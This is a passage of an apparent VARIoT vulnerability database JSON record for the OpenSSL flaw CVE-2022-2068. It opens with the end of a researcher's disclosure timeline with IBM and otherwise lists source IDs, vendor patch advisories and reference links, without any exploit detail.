Security bulletin for ibm security published: https://www.ibm.com/support/pages/node/7147932. \n* Apr 10, 2024: I reached IBM regarding a new security bulletin, with a potential vulnerability I reported https://www.ibm.com/support/pages/node/7145828. \n* Apr 10, 2024: IBM said this security bulletin was unrelated to the vulnerabilities I reported. \n* Apr 15, 2024: IBM confirmed that the final vulnerabilities would be fixed in ISVA 10.0.8. \n* Apr 15, 2024: I provided a list of unfixed vulnerabilities and asked for more information. \n* Apr 16, 2024: IBM confirmed that all the unfixed vulnerabilities would be fixed in ISVA 10.0.8 and asked to close the ticket. \n* Apr 16, 2024: I confirmed that this ticket can be closed only when the security patches are available. \n* Apr 16, 2024: IBM confirmed they wanted to close the ticket because nothing would be updated before mid-2024. \n* Apr 17, 2024: I replied that \"It makes no sense to close this ticket until the vulnerabilities have been fixed. The fact that the vulnerabilities are fixed mid-year is a decision made by IBM. IBM was made aware of these vulnerabilities over a year ago, and yet we are still waiting for security patches. If this ticket is closed, I would consider that the vulnerabilities have been fixed and it is perfectly fine to publish the technical analysis.\"\n* May 6, 2024: IBM closed the existing ticket and opened new tickets for the remaining vulnerabilities. \n* May 6, 2024: I contacted IBM PSIRT asking if it was fine to publish the vulnerabilities since the ticket was closed by IBM. \n* May 7, 2024: I reopened the ticket stating that some of the patched vulnerabilities did not receive a CVE and there were also some unpatched vulnerabilities. I asked IBM to provide me with the CVE assigned to each vulnerability. I also asked IBM to confirm that, since this ticket had been closed by IBM, all the vulnerabilities had been fixed and that I would be able to publish the technical details. \n* May 8, 2024: IBM said they would review the list of vulnerabilities. \n* May 10, 2024: IBM PSIRT asked me not to publish technical details of unpatched vulnerabilities. \n* May 17, 2024: IBM provided me with an incomplete list of CVEs, with different vulnerabilities under the same CVE identifier and asked to close the ticket. \n* May 20, 2024: IBM asked for my comments on the list of CVEs. \n* May 20, 2024: I confirmed that several CVEs were missing and the list was incomplete. \n* May 21, 2024: IBM provided me with an explanation regarding the missing CVEs. \n* May 21, 2024: I asked IBM to quote their explanation in the security advisory. \n* May 21, 2024: IBM asked to have a meeting. \n* May 22, 2024: I replied that I would prefer written communication since it was very difficult to track the status of the vulnerabilities with (1) CVEs obtained only several months after the release of security bulletins, (2) tickets closed by IBM for unpatched vulnerabilities, (3) vulnerabilities in ibmsecurity which could be corrected by IBM and which could then no longer be managed by IBM, and (4) missing CVEs. \n* May 22, 2024: IBM asked to have a meeting to remove any confusion. \n* May 23, 2024: I replied that there\u0027s not much confusion except missing CVEs for silently patched vulnerabilities and lack of communication from IBM when releasing security patches. I asked IBM to share the CVEs with the corresponding vulnerabilities and indicate the security bulletins with the list of corresponding vulnerabilities. \n* May 24, 2024: IBM stated they would provide me with additional CVEs. \n* May 30, 2024: I confirmed that the creation of additional CVEs is fair. \n* Jun 2, 2024: IBM confirmed 3 new CVEs in a new security bulletin: https://www.ibm.com/support/pages/node/7155356. \n* Jun 3, 2024: I asked IBM the release date of the 10.0.8 version. \n* Jun 3, 2024: IBM confirmed that the exact date was not yet decided. \n* Jun 6, 2024: IBM asked if I had comments about the remaining vulnerabilities. \n* Jun 8, 2024: I asked IBM the status of a previously patched vulnerability. \n* Jun 10, 2024: IBM confirmed that this vulnerability had not been previously patched and would be patched in the 10.0.8 release. \n* Jun 11, 2024: IBM asked to create separate cases for the remaining vulnerabilities. \n* Jun 19, 2024: IBM asked if I needed assistance. \n* Jun 23, 2024: IBM confirmed that the 10.0.8 version was released and that they would close the ticket tracking the vulnerabilities. \n* Jun 26, 2024: I asked IBM to provide the corresponding CVEs and the link of the security bulletin. \n* Jun 27, 2024: IBM provided me with the link to the security bulletin: https://www.ibm.com/support/pages/node/7158790 and said that the 10.0.8 version was released with all the patched vulnerabilities. IBM closed the ticket. \n* Jul 3, 2024: I reopened the ticket and asked IBM to provide me with the list of vulnerabilities with the corresponding CVEs since I was not able to correctly map the CVEs to the vulnerabilities I reported. \n* Jul 8, 2024: IBM provided me with the list of CVEs. IBM closed the ticket. \n* Sep 7, 2024: I sent an email to IBM PSIRT stating that I was going to publish the security advisory and that some CVEs were still missing. I also stated that CVE-2023-38371 seemed to be an error since it was confirmed not to be a vulnerability according to our previous email exchanges. \n* Sep 9, 2024: I asked IBM to provide me with an official link regarding the runtime authentication bypass, to publish it in the security advisory. \n* Sep 13, 2024: IBM PSIRT provided me with (1) links regarding the runtime authentication bypass and (2) additional CVEs. They also confirmed that at least one vulnerability was not fixed and asked me not to disclose this finding until it was patched. No information was provided when this vulnerability would be patched. \n* Nov 1, 2024: A security advisory is published. \n\n\n\n## Credits\n\nThese vulnerabilities were found by Pierre Barre aka Pierre Kim (@PierreKimSec). \n\n\n\n## References\n\nhttps://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html\n\nhttps://pierrekim.github.io/advisories/2024-ibm-security-verify-access.txt\n\nhttps://pierrekim.github.io/blog/2024-11-01-ibmsecurity-4-vulnerabilities.html\n\nhttps://pierrekim.github.io/advisories/2024-ibmsecurity.txt\n\nhttps://www.ibm.com/support/pages/node/7106586\n\nhttps://www.ibm.com/support/pages/node/7145400\n\nhttps://www.ibm.com/support/pages/node/7155356\n\nhttps://www.ibm.com/support/pages/node/7158790\n\n\n\n## Disclaimer\n\nThis advisory is licensed under a Creative Commons Attribution Non-Commercial\nShare-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/\n\n-----BEGIN PGP SIGNATURE-----\n\niQIzBAEBCgAdFiEEoSgI9MSrzxDXWrmCxD4O2n2TLbwFAmckrf4ACgkQxD4O2n2T\nLbzphQ//dkcrCH8Q+yNrjdYoxvY/wXwc1JfgXxmLK7Ns3N5qFJVT70Uea6HjIoHz\neJQurricioTP8jG48J2uzIt7l4G4Kgv0zP+aPN/KXjfYghu46N4G29458OgXTHVe\necOmouy/za1DG6qtST+sbicDhX5oku4VtdQ+NtDXaoLUAkADp/wJ3rLv5Fdw7gxQ\nVR0OMUTsy50Vv1bRN2R77ZAs/odAY67pQfTw8QpKLDDLBZveeAwBLgc66rQ+KZjq\nmPbLUULFlZp3+EYnR+XyZXu2nNGZDhTVMKAYCGzuqr3/boIz1BF7rifK07tL8+EE\n+NQQK3kzauWuQ/Sl5X20kfvdC91g7d/G93Me+Uz9iSfB9cyDfAdCLNf6fyYi/xjE\nqz6HNe2capSG7GBeCK6Q8ffb95kojjKrmyL2eKj2Yz5ZCWuDXa0L6pLwHZ9KSyjj\n24kykmiHI4bCKBCXazBVYcdguk+6PCcenAGxLIpKdmTcMvaUUbN/c2jUenjV8/As\n+akcA48mNjuITE+Qei9kn7R5huTSCZffws9j4r0P86dst0ZkYfNSWgThatk2NRwC\nV8D2DOXdxpXThuOAMfN4b9ViLYTeHm2/JGvl0RLQNyNSv2rWeeEch6Z69NsS/Fq7\nY7L55juYeCFtkTrdYA+tkaUHlvX8uQC9GoKkcUOfYV6utGQ4fnU=\n=3Ax6\n-----END PGP SIGNATURE-----\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2022-2068"
      },
      {
        "db": "VULMON",
        "id": "CVE-2022-2068"
      },
      {
        "db": "PACKETSTORM",
        "id": "168022"
      },
      {
        "db": "PACKETSTORM",
        "id": "169396"
      },
      {
        "db": "PACKETSTORM",
        "id": "168112"
      },
      {
        "db": "PACKETSTORM",
        "id": "170741"
      },
      {
        "db": "PACKETSTORM",
        "id": "170196"
      },
      {
        "db": "PACKETSTORM",
        "id": "170165"
      },
      {
        "db": "PACKETSTORM",
        "id": "175432"
      },
      {
        "db": "PACKETSTORM",
        "id": "170179"
      },
      {
        "db": "PACKETSTORM",
        "id": "182466"
      }
    ],
    "trust": 1.8
  },
  "external_ids": {
    "_id": null,
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2022-2068",
        "trust": 2.0
      },
      {
        "db": "SIEMENS",
        "id": "SSA-332410",
        "trust": 1.1
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-22-319-01",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2022-2068",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "168022",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "169396",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "168112",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "170741",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "170196",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "170165",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "175432",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "170179",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "182466",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2022-2068"
      },
      {
        "db": "PACKETSTORM",
        "id": "168022"
      },
      {
        "db": "PACKETSTORM",
        "id": "169396"
      },
      {
        "db": "PACKETSTORM",
        "id": "168112"
      },
      {
        "db": "PACKETSTORM",
        "id": "170741"
      },
      {
        "db": "PACKETSTORM",
        "id": "170196"
      },
      {
        "db": "PACKETSTORM",
        "id": "170165"
      },
      {
        "db": "PACKETSTORM",
        "id": "175432"
      },
      {
        "db": "PACKETSTORM",
        "id": "170179"
      },
      {
        "db": "PACKETSTORM",
        "id": "182466"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-2068"
      }
    ]
  },
  "id": "VAR-202206-1428",
  "iot": {
    "_id": null,
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.416330645
  },
  "last_update_date": "2026-03-09T20:23:37.685000Z",
  "patch": {
    "_id": null,
    "data": [
      {
        "title": "Debian Security Advisories: DSA-5169-1 openssl -- security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=6b57464ee127384d3d853e9cc99cf350"
      },
      {
        "title": "Amazon Linux AMI: ALAS-2022-1626",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=ALAS-2022-1626"
      },
      {
        "title": "Debian CVElist Bug Report Logs: openssl: CVE-2022-2097",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=740b837c53d462fc86f3cb0849b86ca0"
      },
      {
        "title": "Arch Linux Issues: ",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=CVE-2022-2068"
      },
      {
        "title": "Amazon Linux 2: ALAS2-2022-1832",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=ALAS2-2022-1832"
      },
      {
        "title": "Amazon Linux 2: ALAS2-2022-1831",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=ALAS2-2022-1831"
      },
      {
        "title": "Amazon Linux 2: ALASOPENSSL-SNAPSAFE-2023-001",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=ALASOPENSSL-SNAPSAFE-2023-001"
      },
      {
        "title": "Red Hat: ",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=CVE-2022-2068"
      },
      {
        "title": "Red Hat: Moderate: Red Hat JBoss Web Server 5.7.1 release and security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20228917 - Security Advisory"
      },
      {
        "title": "Red Hat: Moderate: Red Hat JBoss Web Server 5.7.1 release and security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20228913 - Security Advisory"
      },
      {
        "title": "Red Hat: Moderate: openssl security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20225818 - Security Advisory"
      },
      {
        "title": "Red Hat: Important: Red Hat Satellite Client security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20235982 - Security Advisory"
      },
      {
        "title": "Red Hat: Moderate: openssl security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226224 - Security Advisory"
      },
      {
        "title": "Red Hat: Important: Release of containers for OSP 16.2.z director operator tech preview",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226517 - Security Advisory"
      },
      {
        "title": "Red Hat: Important: Self Node Remediation Operator 0.4.1 security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226184 - Security Advisory"
      },
      {
        "title": "Red Hat: Important: Satellite 6.11.5.6 async security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20235980 - Security Advisory"
      },
      {
        "title": "Amazon Linux 2022: ALAS2022-2022-123",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2022\u0026qid=ALAS2022-2022-123"
      },
      {
        "title": "Red Hat: Important: Satellite 6.12.5.2 Async Security Update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20235979 - Security Advisory"
      },
      {
        "title": "Red Hat: Critical: Multicluster Engine for Kubernetes 2.0.2 security and bug fixes",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226422 - Security Advisory"
      },
      {
        "title": "Brocade Security Advisories: Access Denied",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=brocade_security_advisories\u0026qid=8efbc4133194fcddd0bca99df112b683"
      },
      {
        "title": "Red Hat: Moderate: OpenShift Container Platform 4.11.1 bug fix and security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226103 - Security Advisory"
      },
      {
        "title": "Amazon Linux 2022: ALAS2022-2022-195",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2022\u0026qid=ALAS2022-2022-195"
      },
      {
        "title": "Red Hat: Important: Node Maintenance Operator 4.11.1 security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226188 - Security Advisory"
      },
      {
        "title": "Red Hat: Moderate: Openshift Logging Security and Bug Fix update (5.3.11)",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226182 - Security Advisory"
      },
      {
        "title": "Red Hat: Important: Logging Subsystem 5.5.0 - Red Hat OpenShift security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226051 - Security Advisory"
      },
      {
        "title": "Red Hat: Moderate: Red Hat OpenShift Service Mesh 2.2.2 Containers security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226283 - Security Advisory"
      },
      {
        "title": "Red Hat: Moderate: Logging Subsystem 5.4.5 Security and Bug Fix Update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226183 - Security Advisory"
      },
      {
        "title": "Red Hat: Critical: Red Hat Advanced Cluster Management 2.5.2 security fixes and bug fixes",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226507 - Security Advisory"
      },
      {
        "title": "Red Hat: Moderate: RHOSDT 2.6.0 operator/operand containers Security Update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20227055 - Security Advisory"
      },
      {
        "title": "Red Hat: Moderate: OpenShift sandboxed containers 1.3.1 security fix and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20227058 - Security Advisory"
      },
      {
        "title": "Red Hat: Moderate: Red Hat JBoss Core Services Apache HTTP Server 2.4.51 SP1 security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20228840 - Security Advisory"
      },
      {
        "title": "Red Hat: Moderate: New container image for Red Hat Ceph Storage 5.2 Security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226024 - Security Advisory"
      },
      {
        "title": "Red Hat: Moderate: RHACS 3.72 enhancement and security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226714 - Security Advisory"
      },
      {
        "title": "Red Hat: Moderate: OpenShift API for Data Protection (OADP) 1.1.0 security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226290 - Security Advisory"
      },
      {
        "title": "Red Hat: Moderate: Gatekeeper Operator v0.2 security and container updates",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226348 - Security Advisory"
      },
      {
        "title": "Red Hat: Moderate: Multicluster Engine for Kubernetes 2.1 security updates and bug fixes",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226345 - Security Advisory"
      },
      {
        "title": "Red Hat: Important: Red Hat JBoss Core Services Apache HTTP Server 2.4.51 SP1 security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20228841 - Security Advisory"
      },
      {
        "title": "Red Hat: Moderate: RHSA: Submariner 0.13 - security and enhancement update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226346 - Security Advisory"
      },
      {
        "title": "Red Hat: Moderate: OpenShift API for Data Protection (OADP) 1.0.4 security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226430 - Security Advisory"
      },
      {
        "title": "Red Hat: Moderate: Red Hat Advanced Cluster Management 2.6.0 security updates and bug fixes",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226370 - Security Advisory"
      },
      {
        "title": "Red Hat: Moderate: Red Hat Advanced Cluster Management 2.3.12 security updates and bug fixes",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226271 - Security Advisory"
      },
      {
        "title": "Red Hat: Critical: Red Hat Advanced Cluster Management 2.4.6 security update and bug fixes",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226696 - Security Advisory"
      },
      {
        "title": "Red Hat: Important: Red Hat OpenShift Data Foundation 4.11.0 security, enhancement, \u0026 bugfix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226156 - Security Advisory"
      },
      {
        "title": "Red Hat: Moderate: OpenShift Virtualization 4.11.1 security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20228750 - Security Advisory"
      },
      {
        "title": "Red Hat: Important: OpenShift Virtualization 4.11.0 Images security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226526 - Security Advisory"
      },
      {
        "title": "Red Hat: Important: Migration Toolkit for Containers (MTC) 1.7.4 security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226429 - Security Advisory"
      },
      {
        "title": "Red Hat: Important: OpenShift Virtualization 4.12.0 Images security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20230408 - Security Advisory"
      },
      {
        "title": "Red Hat: Moderate: Openshift Logging 5.3.14 bug fix release and security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20228889 - Security Advisory"
      },
      {
        "title": "Red Hat: Moderate: Logging Subsystem 5.5.5 - Red Hat OpenShift security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20228781 - Security Advisory"
      },
      {
        "title": "Red Hat: Important: OpenShift Container Platform 4.11.0 bug fix and security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20225069 - Security Advisory"
      },
      {
        "title": "Smart Check Scan-Report",
        "trust": 0.1,
        "url": "https://github.com/mawinkler/c1-cs-scan-result "
      },
      {
        "title": "Repository with scripts to verify system against CVE",
        "trust": 0.1,
        "url": "https://github.com/backloop-biz/Vulnerability_checker "
      },
      {
        "title": "https://github.com/jntass/TASSL-1.1.1",
        "trust": 0.1,
        "url": "https://github.com/jntass/TASSL-1.1.1 "
      },
      {
        "title": "Repository with scripts to verify system against CVE",
        "trust": 0.1,
        "url": "https://github.com/backloop-biz/CVE_checks "
      },
      {
        "title": "https://github.com/tianocore-docs/ThirdPartySecurityAdvisories",
        "trust": 0.1,
        "url": "https://github.com/tianocore-docs/ThirdPartySecurityAdvisories "
      },
      {
        "title": "OpenSSL-CVE-lib",
        "trust": 0.1,
        "url": "https://github.com/chnzzh/OpenSSL-CVE-lib "
      },
      {
        "title": "The Register",
        "trust": 0.1,
        "url": "https://www.theregister.co.uk/2022/06/27/openssl_304_memory_corruption_bug/"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2022-2068"
      }
    ]
  },
  "problemtype_data": {
    "_id": null,
    "data": [
      {
        "problemtype": "CWE-78",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2022-2068"
      }
    ]
  },
  "references": {
    "_id": null,
    "data": [
      {
        "trust": 1.2,
        "url": "https://www.debian.org/security/2022/dsa-5169"
      },
      {
        "trust": 1.1,
        "url": "https://www.openssl.org/news/secadv/20220621.txt"
      },
      {
        "trust": 1.1,
        "url": "https://security.netapp.com/advisory/ntap-20220707-0008/"
      },
      {
        "trust": 1.1,
        "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf"
      },
      {
        "trust": 1.1,
        "url": "https://git.openssl.org/gitweb/?p=openssl.git%3ba=commitdiff%3bh=2c9c35870601b4a44d86ddbf512b38df38285cfa"
      },
      {
        "trust": 1.1,
        "url": "https://git.openssl.org/gitweb/?p=openssl.git%3ba=commitdiff%3bh=9639817dac8bbbaa64d09efad7464ccc405527c7"
      },
      {
        "trust": 1.1,
        "url": "https://git.openssl.org/gitweb/?p=openssl.git%3ba=commitdiff%3bh=7a9c027159fe9e1bbc2cd38a8a2914bff0d5abd9"
      },
      {
        "trust": 1.1,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6wzzbkuhqfgskgnxxkicsrpl7amvw5m5/"
      },
      {
        "trust": 1.1,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/vcmnwkerpbkoebnl7clttx3zzczlh7xa/"
      },
      {
        "trust": 1.0,
        "url": "https://gitlab.com/fraf0/cve-2022-1292-re_score-analysis"
      },
      {
        "trust": 1.0,
        "url": "http://seclists.org/fulldisclosure/2024/nov/0"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-2068"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-1292"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2022-1292"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2022-2068"
      },
      {
        "trust": 0.6,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.6,
        "url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2022-2097"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2022-1586"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2022-1785"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2022-1897"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2022-1927"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-2097"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-1586"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/updates/classification/#moderate"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2022-37434"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-1897"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-1927"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-1785"
      },
      {
        "trust": 0.2,
        "url": "https://issues.jboss.org/):"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-38561"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-30631"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-38561"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-26716"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-27406"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-30293"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-35525"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-40674"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-22624"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-34903"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-22662"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-35527"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2016-3709"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-3709"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-42898"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-22629"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-26717"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-35525"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-32208"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-26719"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-2509"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-26709"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-26700"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-27405"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-26710"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-1304"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-27404"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-32206"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-35527"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-22628"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-3515"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/78.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/backloop-biz/vulnerability_checker"
      },
      {
        "trust": 0.1,
        "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-319-01"
      },
      {
        "trust": 0.1,
        "url": "https://alas.aws.amazon.com/alas-2022-1626.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-25314"
      },
      {
        "trust": 0.1,
